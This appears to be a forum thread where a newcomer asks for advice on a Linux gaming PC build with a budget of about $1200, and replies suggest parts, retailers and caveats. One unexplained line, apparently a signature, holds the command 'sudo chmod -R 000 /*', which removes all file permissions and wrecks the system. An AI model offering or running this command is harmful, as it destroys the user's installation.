1000-1200 $ Linux gaming pc

Hi I'm new to PCMR and I'd like to build a linux compatible pc that can game at 1080p60 and do some light virtualisation , I am located in Poland but after converting my budget is around 1200USD.For my distro I'd like for it to run KDE Neon .I have come up with those specs , are they good?

core i5 8500

b360 chipset

16gb ram

GTX 1060 6gb(I would like to put some money aside for a next gen card )

512 gb ssd

These are the specifications I've come up with , any other ideas would be appreciated.

It's hard to say what you should be buying without knowing the prices in Poland - certainly you could spare a little money by going for a 256gb ssd plus a hard disk and potentially use that money to get a better graphics card. You could also save a little on the cpu by going for an 8400 (or a ryzen 5 1600x).

I would also advise against running linux on a primarily gaming pc unless you know EXACTLY what you're getting into and that your favourite games will run without problems.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

https://www.alternate.lu/html/cart/loadSharedCart.html?id=7b943f2256a801f0bb6a01d78a68c893

Here's a build I made on a german site, so you have the european prices. It's 1120$ / 961€

It's a template, be free to modify the list as you wish. Good luck!

Here's a pretty cheap windows Home 10 key: https://www.mmoga.com/Software/Windows/Windows-10-Home-OEM.html

RGB & Fan control ULTIMATE GUIDE !

No siema.

Are you going to be using Linux exclusively on the machine, or besides Windows?

For the best chance of Linux compatibility, don't choose a gaming motherboard. Also, don't get less than 16GB. In general, your idea of the build is pretty great.